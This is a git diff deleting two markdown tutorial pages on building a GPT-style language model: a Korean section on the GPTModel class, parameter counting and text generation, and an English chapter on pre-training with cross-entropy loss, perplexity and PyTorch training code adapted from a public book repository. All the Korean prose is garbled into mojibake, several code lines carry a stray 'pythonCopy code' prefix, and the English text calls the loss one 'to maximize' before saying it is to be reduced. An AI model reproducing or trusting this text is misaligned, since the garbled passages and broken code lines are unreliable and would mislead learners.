- -### **GPTModel** - -_ํ–‰๋ ฌ์˜ ํ˜•ํƒœ๋ฅผ ๋” ์ž˜ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์„์œผ๋กœ ํ˜•ํƒœ๊ฐ€ ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค:_ -```python -# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04 -class GPTModel(nn.Module): -def __init__(self, cfg): -super().__init__() -self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"]) -# shape: (vocab_size, emb_dim) - -self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"]) -# shape: (context_length, emb_dim) - -self.drop_emb = nn.Dropout(cfg["drop_rate"]) - -self.trf_blocks = nn.Sequential( -*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])] -) -# Stack of TransformerBlocks - -self.final_norm = LayerNorm(cfg["emb_dim"]) -self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False) -# shape: (emb_dim, vocab_size) - -def forward(self, in_idx): -# in_idx shape: (batch_size, seq_len) -batch_size, seq_len = in_idx.shape - -# Token embeddings -tok_embeds = self.tok_emb(in_idx) -# shape: (batch_size, seq_len, emb_dim) - -# Positional embeddings -pos_indices = torch.arange(seq_len, device=in_idx.device) -# shape: (seq_len,) -pos_embeds = self.pos_emb(pos_indices) -# shape: (seq_len, emb_dim) - -# Add token and positional embeddings -x = tok_embeds + pos_embeds # Broadcasting over batch dimension -# x shape: (batch_size, seq_len, emb_dim) - -x = self.drop_emb(x) # Dropout applied -# x shape remains: (batch_size, seq_len, emb_dim) - -x = self.trf_blocks(x) # Pass through Transformer blocks -# x shape remains: (batch_size, seq_len, emb_dim) - -x = self.final_norm(x) # Final LayerNorm -# x shape remains: (batch_size, seq_len, emb_dim) - -logits = self.out_head(x) # Project to vocabulary size -# logits shape: (batch_size, seq_len, vocab_size) - -return logits # Output shape: (batch_size, seq_len, vocab_size) -``` -#### **๋ชฉ์  ๋ฐ ๊ธฐ๋Šฅ** - -- **์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด:** -- **ํ† ํฐ ์ž„๋ฒ ๋”ฉ (`tok_emb`):** ํ† ํฐ ์ธ๋ฑ์Šค๋ฅผ ์ž„๋ฒ ๋”ฉ์œผ๋กœ ๋ณ€ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ์ƒ๊ธฐ ์ฐธ๊ณ , ์ด๋Š” ์–ดํœ˜์˜ ๊ฐ ํ† ํฐ์˜ ๊ฐ ์ฐจ์›์— ์ฃผ์–ด์ง„ ๊ฐ€์ค‘์น˜์ž…๋‹ˆ๋‹ค. -- **์œ„์น˜ ์ž„๋ฒ ๋”ฉ (`pos_emb`):** ์ž„๋ฒ ๋”ฉ์— ์œ„์น˜ ์ •๋ณด๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ ํ† ํฐ์˜ ์ˆœ์„œ๋ฅผ ์บก์ฒ˜ํ•ฉ๋‹ˆ๋‹ค. ์ƒ๊ธฐ ์ฐธ๊ณ , ์ด๋Š” ํ…์ŠคํŠธ์—์„œ์˜ ์œ„์น˜์— ๋”ฐ๋ผ ํ† ํฐ์— ์ฃผ์–ด์ง„ ๊ฐ€์ค‘์น˜์ž…๋‹ˆ๋‹ค. -- **๋“œ๋กญ์•„์›ƒ (`drop_emb`):** ์ •๊ทœํ™”๋ฅผ ์œ„ํ•ด ์ž„๋ฒ ๋”ฉ์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. -- **ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก (`trf_blocks`):** ์ž„๋ฒ ๋”ฉ์„ ์ฒ˜๋ฆฌํ•˜๊ธฐ ์œ„ํ•œ `n_layers` ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์˜ ์Šคํƒ์ž…๋‹ˆ๋‹ค. -- **์ตœ์ข… ์ •๊ทœํ™” (`final_norm`):** ์ถœ๋ ฅ ๋ ˆ์ด์–ด ์ด์ „์˜ ๋ ˆ์ด์–ด ์ •๊ทœํ™”์ž…๋‹ˆ๋‹ค. -- **์ถœ๋ ฅ ๋ ˆ์ด์–ด (`out_head`):** ์ตœ์ข… ์€๋‹‰ ์ƒํƒœ๋ฅผ ์–ดํœ˜ ํฌ๊ธฐ๋กœ ํ”„๋กœ์ ์…˜ํ•˜์—ฌ ์˜ˆ์ธก์„ ์œ„ํ•œ ๋กœ์ง“์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. - -> [!NOTE] -> ์ด ํด๋ž˜์Šค์˜ ๋ชฉํ‘œ๋Š” **์‹œํ€€์Šค์—์„œ ๋‹ค์Œ ํ† ํฐ์„ ์˜ˆ์ธกํ•˜๊ธฐ ์œ„ํ•ด** ์–ธ๊ธ‰๋œ ๋ชจ๋“  ๋‹ค๋ฅธ ๋„คํŠธ์›Œํฌ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Š” ํ…์ŠคํŠธ ์ƒ์„ฑ๊ณผ ๊ฐ™์€ ์ž‘์—…์— ๊ธฐ๋ณธ์ ์ž…๋‹ˆ๋‹ค. -> -> ์–ผ๋งˆ๋‚˜ ๋งŽ์€ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด **์ง€์ •๋œ ๋Œ€๋กœ ์‚ฌ์šฉ๋  ๊ฒƒ์ธ์ง€** ์ฃผ๋ชฉํ•˜๊ณ , ๊ฐ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด ํ•˜๋‚˜์˜ ๋ฉ€ํ‹ฐ ํ—ค๋“œ ์–ดํ…์…˜ ๋„คํŠธ์›Œํฌ, ํ•˜๋‚˜์˜ ํ”ผ๋“œ ํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ ๋ฐ ์—ฌ๋Ÿฌ ์ •๊ทœํ™”๋ฅผ ์‚ฌ์šฉํ•˜๋Š”์ง€ ์ฃผ๋ชฉํ•˜์‹ญ์‹œ์˜ค. ๋”ฐ๋ผ์„œ 12๊ฐœ์˜ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด ์‚ฌ์šฉ๋˜๋ฉด ์ด๋ฅผ 12๋กœ ๊ณฑํ•ฉ๋‹ˆ๋‹ค. -> -> ๊ฒŒ๋‹ค๊ฐ€, **์ •๊ทœํ™”** ๋ ˆ์ด์–ด๊ฐ€ **์ถœ๋ ฅ** ์ด์ „์— ์ถ”๊ฐ€๋˜๊ณ , ์ตœ์ข… ์„ ํ˜• ๋ ˆ์ด์–ด๊ฐ€ ๋์— ์ ์šฉ๋˜์–ด ์ ์ ˆํ•œ ์ฐจ์›์˜ ๊ฒฐ๊ณผ๋ฅผ ์–ป์Šต๋‹ˆ๋‹ค. 
๊ฐ ์ตœ์ข… ๋ฒกํ„ฐ๊ฐ€ ์‚ฌ์šฉ๋œ ์–ดํœ˜์˜ ํฌ๊ธฐ๋ฅผ ๊ฐ€์ง€๋Š” ์ด์œ ๋Š” ์–ดํœ˜ ๋‚ด์˜ ๊ฐ€๋Šฅํ•œ ๊ฐ ํ† ํฐ์— ๋Œ€ํ•œ ํ™•๋ฅ ์„ ์–ป์œผ๋ ค ํ•˜๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. - -## ํ›ˆ๋ จํ•  ๋งค๊ฐœ๋ณ€์ˆ˜ ์ˆ˜ - -GPT ๊ตฌ์กฐ๊ฐ€ ์ •์˜๋˜๋ฉด ํ›ˆ๋ จํ•  ๋งค๊ฐœ๋ณ€์ˆ˜ ์ˆ˜๋ฅผ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: -```python -GPT_CONFIG_124M = { -"vocab_size": 50257, # Vocabulary size -"context_length": 1024, # Context length -"emb_dim": 768, # Embedding dimension -"n_heads": 12, # Number of attention heads -"n_layers": 12, # Number of layers -"drop_rate": 0.1, # Dropout rate -"qkv_bias": False # Query-Key-Value bias -} - -model = GPTModel(GPT_CONFIG_124M) -total_params = sum(p.numel() for p in model.parameters()) -print(f"Total number of parameters: {total_params:,}") -# Total number of parameters: 163,009,536 -``` -### **๋‹จ๊ณ„๋ณ„ ๊ณ„์‚ฐ** - -#### **1. ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด: ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋ฐ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ** - -- **๋ ˆ์ด์–ด:** `nn.Embedding(vocab_size, emb_dim)` -- **๋งค๊ฐœ๋ณ€์ˆ˜:** `vocab_size * emb_dim` -```python -token_embedding_params = 50257 * 768 = 38,597,376 -``` -- **Layer:** `nn.Embedding(context_length, emb_dim)` -- **Parameters:** `context_length * emb_dim` -```python -position_embedding_params = 1024 * 768 = 786,432 -``` -**์ด ์ž„๋ฒ ๋”ฉ ๋งค๊ฐœ๋ณ€์ˆ˜** -```python -embedding_params = token_embedding_params + position_embedding_params -embedding_params = 38,597,376 + 786,432 = 39,383,808 -``` -#### **2. Transformer Blocks** - -12๊ฐœ์˜ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์ด ์žˆ์œผ๋ฏ€๋กœ, ํ•˜๋‚˜์˜ ๋ธ”๋ก์— ๋Œ€ํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ๊ณ„์‚ฐํ•œ ํ›„ 12๋ฅผ ๊ณฑํ•ฉ๋‹ˆ๋‹ค. - -**ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก๋‹น ๋งค๊ฐœ๋ณ€์ˆ˜** - -**a. ๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ (Multi-Head Attention)** - -- **๊ตฌ์„ฑ ์š”์†Œ:** -- **์ฟผ๋ฆฌ ์„ ํ˜• ๋ ˆ์ด์–ด (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)` -- **ํ‚ค ์„ ํ˜• ๋ ˆ์ด์–ด (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)` -- **๊ฐ’ ์„ ํ˜• ๋ ˆ์ด์–ด (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)` -- **์ถœ๋ ฅ ํ”„๋กœ์ ์…˜ (`out_proj`):** `nn.Linear(emb_dim, emb_dim)` -- **๊ณ„์‚ฐ:** - -- **๊ฐ๊ฐ์˜ `W_query`, `W_key`, `W_value`:** - -```python -qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824 -``` - -์ด๋Ÿฌํ•œ ๋ ˆ์ด์–ด๊ฐ€ ์„ธ ๊ฐœ ์žˆ์œผ๋ฏ€๋กœ: - -```python -total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472 -``` - -- **์ถœ๋ ฅ ํ”„๋กœ์ ์…˜ (`out_proj`):** - -```python -out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592 -``` - -- **์ด ๋‹ค์ค‘ ํ—ค๋“œ ์ฃผ์˜ ๋งค๊ฐœ๋ณ€์ˆ˜:** - -```python -mha_params = total_qkv_params + out_proj_params -mha_params = 1,769,472 + 590,592 = 2,360,064 -``` - -**b. ํ”ผ๋“œํฌ์›Œ๋“œ ๋„คํŠธ์›Œํฌ (FeedForward Network)** - -- **๊ตฌ์„ฑ ์š”์†Œ:** -- **์ฒซ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** `nn.Linear(emb_dim, 4 * emb_dim)` -- **๋‘ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** `nn.Linear(4 * emb_dim, emb_dim)` -- **๊ณ„์‚ฐ:** - -- **์ฒซ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** - -```python -ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim) -ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368 -``` - -- **๋‘ ๋ฒˆ์งธ ์„ ํ˜• ๋ ˆ์ด์–ด:** - -```python -ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim -ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064 -``` - -- **์ด ํ”ผ๋“œํฌ์›Œ๋“œ ๋งค๊ฐœ๋ณ€์ˆ˜:** - -```python -ff_params = ff_first_layer_params + ff_second_layer_params -ff_params = 2,362,368 + 2,360,064 = 4,722,432 -``` - -**c. ๋ ˆ์ด์–ด ์ •๊ทœํ™” (Layer Normalizations)** - -- **๊ตฌ์„ฑ ์š”์†Œ:** -- ๋ธ”๋ก๋‹น ๋‘ ๊ฐœ์˜ `LayerNorm` ์ธ์Šคํ„ด์Šค. 
-- ๊ฐ `LayerNorm`์€ `2 * emb_dim` ๋งค๊ฐœ๋ณ€์ˆ˜(์Šค์ผ€์ผ ๋ฐ ์‹œํ”„ํŠธ)๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **๊ณ„์‚ฐ:** - -```python -layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072 -``` - -**d. ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก๋‹น ์ด ๋งค๊ฐœ๋ณ€์ˆ˜** -```python -pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block -params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568 -``` -**๋ชจ๋“  ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก์˜ ์ด ๋งค๊ฐœ๋ณ€์ˆ˜** -```python -pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers -total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816 -``` -#### **3. ์ตœ์ข… ๋ ˆ์ด์–ด** - -**a. ์ตœ์ข… ๋ ˆ์ด์–ด ์ •๊ทœํ™”** - -- **๋งค๊ฐœ๋ณ€์ˆ˜:** `2 * emb_dim` (์Šค์ผ€์ผ ๋ฐ ์ด๋™) -```python -pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536 -``` -**b. ์ถœ๋ ฅ ํ”„๋กœ์ ์…˜ ๋ ˆ์ด์–ด (`out_head`)** - -- **๋ ˆ์ด์–ด:** `nn.Linear(emb_dim, vocab_size, bias=False)` -- **ํŒŒ๋ผ๋ฏธํ„ฐ:** `emb_dim * vocab_size` -```python -pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376 -``` -#### **4. ๋ชจ๋“  ๋งค๊ฐœ๋ณ€์ˆ˜ ์š”์•ฝ** -```python -pythonCopy codetotal_params = ( -embedding_params + -total_transformer_blocks_params + -final_layer_norm_params + -output_projection_params -) -total_params = ( -39,383,808 + -85,026,816 + -1,536 + -38,597,376 -) -total_params = 163,009,536 -``` -## ํ…์ŠคํŠธ ์ƒ์„ฑ - -๋‹ค์Œ ํ† ํฐ์„ ์˜ˆ์ธกํ•˜๋Š” ๋ชจ๋ธ์ด ์žˆ์œผ๋ฉด, ์ถœ๋ ฅ์—์„œ ๋งˆ์ง€๋ง‰ ํ† ํฐ ๊ฐ’์„ ๊ฐ€์ ธ์˜ค๊ธฐ๋งŒ ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค(์˜ˆ์ธก๋œ ํ† ํฐ์˜ ๊ฐ’์ด ๋  ๊ฒƒ์ด๋ฏ€๋กœ). ์ด๋Š” **์–ดํœ˜์˜ ๊ฐ ํ•ญ๋ชฉ์— ๋Œ€ํ•œ ๊ฐ’**์ด ๋  ๊ฒƒ์ด๋ฉฐ, ๊ทธ๋Ÿฐ ๋‹ค์Œ `softmax` ํ•จ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฐจ์›์„ ํ™•๋ฅ ๋กœ ์ •๊ทœํ™”ํ•˜์—ฌ ํ•ฉ์ด 1์ด ๋˜๋„๋ก ํ•˜๊ณ , ๊ฐ€์žฅ ํฐ ํ•ญ๋ชฉ์˜ ์ธ๋ฑ์Šค๋ฅผ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค. ์ด ์ธ๋ฑ์Šค๋Š” ์–ดํœ˜ ๋‚ด์˜ ๋‹จ์–ด์˜ ์ธ๋ฑ์Šค๊ฐ€ ๋ฉ๋‹ˆ๋‹ค. 
- -์ฝ”๋“œ ์ถœ์ฒ˜ [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb): -```python -def generate_text_simple(model, idx, max_new_tokens, context_size): -# idx is (batch, n_tokens) array of indices in the current context -for _ in range(max_new_tokens): - -# Crop current context if it exceeds the supported context size -# E.g., if LLM supports only 5 tokens, and the context size is 10 -# then only the last 5 tokens are used as context -idx_cond = idx[:, -context_size:] - -# Get the predictions -with torch.no_grad(): -logits = model(idx_cond) - -# Focus only on the last time step -# (batch, n_tokens, vocab_size) becomes (batch, vocab_size) -logits = logits[:, -1, :] - -# Apply softmax to get probabilities -probas = torch.softmax(logits, dim=-1) # (batch, vocab_size) - -# Get the idx of the vocab entry with the highest probability value -idx_next = torch.argmax(probas, dim=-1, keepdim=True) # (batch, 1) - -# Append sampled index to the running sequence -idx = torch.cat((idx, idx_next), dim=1) # (batch, n_tokens+1) - -return idx - - -start_context = "Hello, I am" - -encoded = tokenizer.encode(start_context) -print("encoded:", encoded) - -encoded_tensor = torch.tensor(encoded).unsqueeze(0) -print("encoded_tensor.shape:", encoded_tensor.shape) - -model.eval() # disable dropout - -out = generate_text_simple( -model=model, -idx=encoded_tensor, -max_new_tokens=6, -context_size=GPT_CONFIG_124M["context_length"] -) - -print("Output:", out) -print("Output length:", len(out[0])) -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md deleted file mode 100644 index a9e0a9bb9..000000000 --- a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md +++ /dev/null @@ -1,970 +0,0 @@ -# 6. Pre-training & Loading models - -## Text Generation - -In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**. - -As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose. - -> [!TIP] -> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model. - -## Text Evaluation - -In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens. - -In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**. - -However, instead of working with the raw predictions, it will work with a logarithm with base n. 
So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
-Then, for each entry with a context length of 5 tokens, for example, the model will need to predict 5 tokens: the targets are simply the input shifted by one position, so the first 4 targets already appear in the input and only the fifth is genuinely new. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 targets were part of the input, the model doesn't know this), 5 expected tokens and therefore 5 probabilities to maximize.
-
-Therefore, after taking the natural logarithm of each predicted probability, the **average** is computed and the **sign is flipped** (this is called _cross entropy loss_), and that's the **number to reduce as close to 0 as possible**, because the natural logarithm of 1 is 0:
-
-
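-For instance, a minimal numeric sketch of exactly this computation (made-up logits over a tiny 5-token vocabulary; the manual value matches PyTorch's built-in `cross_entropy`, which is the loss used later in the training code):
-
-```python
-import torch
-
-# Made-up logits for 3 positions over a tiny vocabulary of 5 tokens
-logits = torch.tensor([[ 2.0, 0.5, -1.0, 0.1, 0.3],
-                       [ 0.2, 1.5, -0.5, 0.0, 2.2],
-                       [-0.3, 0.8,  0.4, 1.9, 0.1]])
-targets = torch.tensor([0, 4, 3])   # index of the expected token at each position
-
-# Manual computation: probability of the expected token, natural log, average, flip the sign
-probas = torch.softmax(logits, dim=-1)
-target_probas = probas[torch.arange(3), targets]
-manual_loss = -torch.log(target_probas).mean()
-
-# Same value using the built-in loss
-builtin_loss = torch.nn.functional.cross_entropy(logits, targets)
-
-print(manual_loss.item(), builtin_loss.item())   # identical values
-print(torch.exp(builtin_loss).item())            # exp(cross entropy) = perplexity
-```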

-![Cross entropy loss calculation (figure from the LLMs-from-scratch book, ch05)](https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233)

-
-Another way to measure the quality of the model is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
-For example, a perplexity value of 48,725 means that, when it needs to predict a token, the model is unsure about which one among 48,725 tokens in the vocabulary is the right one.
-
-## Pre-Train Example
-
-This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb), sometimes slightly modified.
-
-
- -Previous code used here but already explained in previous sections - -```python -""" -This is code explained before so it won't be exaplained -""" - -import tiktoken -import torch -import torch.nn as nn -from torch.utils.data import Dataset, DataLoader - - -class GPTDatasetV1(Dataset): - def __init__(self, txt, tokenizer, max_length, stride): - self.input_ids = [] - self.target_ids = [] - - # Tokenize the entire text - token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"}) - - # Use a sliding window to chunk the book into overlapping sequences of max_length - for i in range(0, len(token_ids) - max_length, stride): - input_chunk = token_ids[i:i + max_length] - target_chunk = token_ids[i + 1: i + max_length + 1] - self.input_ids.append(torch.tensor(input_chunk)) - self.target_ids.append(torch.tensor(target_chunk)) - - def __len__(self): - return len(self.input_ids) - - def __getitem__(self, idx): - return self.input_ids[idx], self.target_ids[idx] - - -def create_dataloader_v1(txt, batch_size=4, max_length=256, - stride=128, shuffle=True, drop_last=True, num_workers=0): - # Initialize the tokenizer - tokenizer = tiktoken.get_encoding("gpt2") - - # Create dataset - dataset = GPTDatasetV1(txt, tokenizer, max_length, stride) - - # Create dataloader - dataloader = DataLoader( - dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers) - - return dataloader - - -class MultiHeadAttention(nn.Module): - def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False): - super().__init__() - assert d_out % num_heads == 0, "d_out must be divisible by n_heads" - - self.d_out = d_out - self.num_heads = num_heads - self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim - - self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) - self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) - self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) - self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs - self.dropout = nn.Dropout(dropout) - self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) - - def forward(self, x): - b, num_tokens, d_in = x.shape - - keys = self.W_key(x) # Shape: (b, num_tokens, d_out) - queries = self.W_query(x) - values = self.W_value(x) - - # We implicitly split the matrix by adding a `num_heads` dimension - # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim) - keys = keys.view(b, num_tokens, self.num_heads, self.head_dim) - values = values.view(b, num_tokens, self.num_heads, self.head_dim) - queries = queries.view(b, num_tokens, self.num_heads, self.head_dim) - - # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim) - keys = keys.transpose(1, 2) - queries = queries.transpose(1, 2) - values = values.transpose(1, 2) - - # Compute scaled dot-product attention (aka self-attention) with a causal mask - attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head - - # Original mask truncated to the number of tokens and converted to boolean - mask_bool = self.mask.bool()[:num_tokens, :num_tokens] - - # Use the mask to fill attention scores - attn_scores.masked_fill_(mask_bool, -torch.inf) - - attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) - attn_weights = self.dropout(attn_weights) - - # Shape: (b, num_tokens, num_heads, head_dim) - context_vec = (attn_weights @ values).transpose(1, 2) - - # Combine heads, where self.d_out = 
self.num_heads * self.head_dim - context_vec = context_vec.reshape(b, num_tokens, self.d_out) - context_vec = self.out_proj(context_vec) # optional projection - - return context_vec - - -class LayerNorm(nn.Module): - def __init__(self, emb_dim): - super().__init__() - self.eps = 1e-5 - self.scale = nn.Parameter(torch.ones(emb_dim)) - self.shift = nn.Parameter(torch.zeros(emb_dim)) - - def forward(self, x): - mean = x.mean(dim=-1, keepdim=True) - var = x.var(dim=-1, keepdim=True, unbiased=False) - norm_x = (x - mean) / torch.sqrt(var + self.eps) - return self.scale * norm_x + self.shift - - -class GELU(nn.Module): - def __init__(self): - super().__init__() - - def forward(self, x): - return 0.5 * x * (1 + torch.tanh( - torch.sqrt(torch.tensor(2.0 / torch.pi)) * - (x + 0.044715 * torch.pow(x, 3)) - )) - - -class FeedForward(nn.Module): - def __init__(self, cfg): - super().__init__() - self.layers = nn.Sequential( - nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]), - GELU(), - nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]), - ) - - def forward(self, x): - return self.layers(x) - - -class TransformerBlock(nn.Module): - def __init__(self, cfg): - super().__init__() - self.att = MultiHeadAttention( - d_in=cfg["emb_dim"], - d_out=cfg["emb_dim"], - context_length=cfg["context_length"], - num_heads=cfg["n_heads"], - dropout=cfg["drop_rate"], - qkv_bias=cfg["qkv_bias"]) - self.ff = FeedForward(cfg) - self.norm1 = LayerNorm(cfg["emb_dim"]) - self.norm2 = LayerNorm(cfg["emb_dim"]) - self.drop_shortcut = nn.Dropout(cfg["drop_rate"]) - - def forward(self, x): - # Shortcut connection for attention block - shortcut = x - x = self.norm1(x) - x = self.att(x) # Shape [batch_size, num_tokens, emb_size] - x = self.drop_shortcut(x) - x = x + shortcut # Add the original input back - - # Shortcut connection for feed-forward block - shortcut = x - x = self.norm2(x) - x = self.ff(x) - x = self.drop_shortcut(x) - x = x + shortcut # Add the original input back - - return x - - -class GPTModel(nn.Module): - def __init__(self, cfg): - super().__init__() - self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"]) - self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"]) - self.drop_emb = nn.Dropout(cfg["drop_rate"]) - - self.trf_blocks = nn.Sequential( - *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]) - - self.final_norm = LayerNorm(cfg["emb_dim"]) - self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False) - - def forward(self, in_idx): - batch_size, seq_len = in_idx.shape - tok_embeds = self.tok_emb(in_idx) - pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device)) - x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size] - x = self.drop_emb(x) - x = self.trf_blocks(x) - x = self.final_norm(x) - logits = self.out_head(x) - return logits -``` - -
- -```python -# Download contents to train the data with -import os -import urllib.request - -file_path = "the-verdict.txt" -url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt" - -if not os.path.exists(file_path): - with urllib.request.urlopen(url) as response: - text_data = response.read().decode('utf-8') - with open(file_path, "w", encoding="utf-8") as file: - file.write(text_data) -else: - with open(file_path, "r", encoding="utf-8") as file: - text_data = file.read() - -total_characters = len(text_data) -tokenizer = tiktoken.get_encoding("gpt2") -total_tokens = len(tokenizer.encode(text_data)) - -print("Data downloaded") -print("Characters:", total_characters) -print("Tokens:", total_tokens) - -# Model initialization -GPT_CONFIG_124M = { - "vocab_size": 50257, # Vocabulary size - "context_length": 256, # Shortened context length (orig: 1024) - "emb_dim": 768, # Embedding dimension - "n_heads": 12, # Number of attention heads - "n_layers": 12, # Number of layers - "drop_rate": 0.1, # Dropout rate - "qkv_bias": False # Query-key-value bias -} - -torch.manual_seed(123) -model = GPTModel(GPT_CONFIG_124M) -model.eval() -print ("Model initialized") - - -# Functions to transform from tokens to ids and from to ids to tokens -def text_to_token_ids(text, tokenizer): - encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'}) - encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension - return encoded_tensor - -def token_ids_to_text(token_ids, tokenizer): - flat = token_ids.squeeze(0) # remove batch dimension - return tokenizer.decode(flat.tolist()) - - - -# Define loss functions -def calc_loss_batch(input_batch, target_batch, model, device): - input_batch, target_batch = input_batch.to(device), target_batch.to(device) - logits = model(input_batch) - loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten()) - return loss - - -def calc_loss_loader(data_loader, model, device, num_batches=None): - total_loss = 0. - if len(data_loader) == 0: - return float("nan") - elif num_batches is None: - num_batches = len(data_loader) - else: - # Reduce the number of batches to match the total number of batches in the data loader - # if num_batches exceeds the number of batches in the data loader - num_batches = min(num_batches, len(data_loader)) - for i, (input_batch, target_batch) in enumerate(data_loader): - if i < num_batches: - loss = calc_loss_batch(input_batch, target_batch, model, device) - total_loss += loss.item() - else: - break - return total_loss / num_batches - 